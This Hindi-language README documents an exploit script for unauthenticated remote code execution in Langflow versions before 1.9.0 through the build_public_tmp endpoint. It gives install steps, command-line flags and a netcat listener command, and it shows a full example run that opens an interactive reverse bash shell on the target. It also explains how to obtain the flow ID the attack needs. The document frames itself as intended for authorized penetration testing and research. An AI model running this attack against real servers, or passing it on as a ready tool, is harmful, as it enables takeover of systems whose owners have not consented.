
Langflow <1.9.0 में build_public_tmp एंडपॉइंट के माध्यम से बिना प्रमाणीकरण के रिमोट कोड निष्पादन के लिए एक्सप्लॉइट, जो अधिकृत पेनेट्रेशन टेस्टिंग के लिए रिवर्स शेल प्रदान करता है।
Langflow के लिए build_public_tmp एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन।
पब्लिक फ्लो बिल्ड एंडपॉइंट के माध्यम से एक्सप्लॉइट जो टार्गेट पर रिवर्स शेल निष्पादित करता है।
httpx लाइब्रेरीइंस्टॉल करें:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : Langflow इंस्टेंस का बेस URL (उदा., https://flow.example.com/)-l, --lhost : रिवर्स शेल प्राप्त करने के लिए आपका IP पता-p, --lport : रिवर्स शेल के लिए लिसनिंग पोर्ट-f --flow-id : टार्गेट फ्लो ID (आवश्यक – /api/v1/flows/ या UI से प्राप्त करें)-c --client-id : सत्र पहचान के लिए client_id कुकी मानएक लिसनर शुरू करें:
nc -nlvp 9001
एक्सप्लॉइट चलाएँ:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
सफल होने पर, आपको एक इंटरैक्टिव bash शेल मिलता है।
flow-id आवश्यक है। GET /api/v1/flows के माध्यम से सभी फ्लो सूचीबद्ध करें या ब्राउज़र URL से कॉपी करें।MIT – शैक्षिक और नैतिक सुरक्षा अनुसंधान के लिए।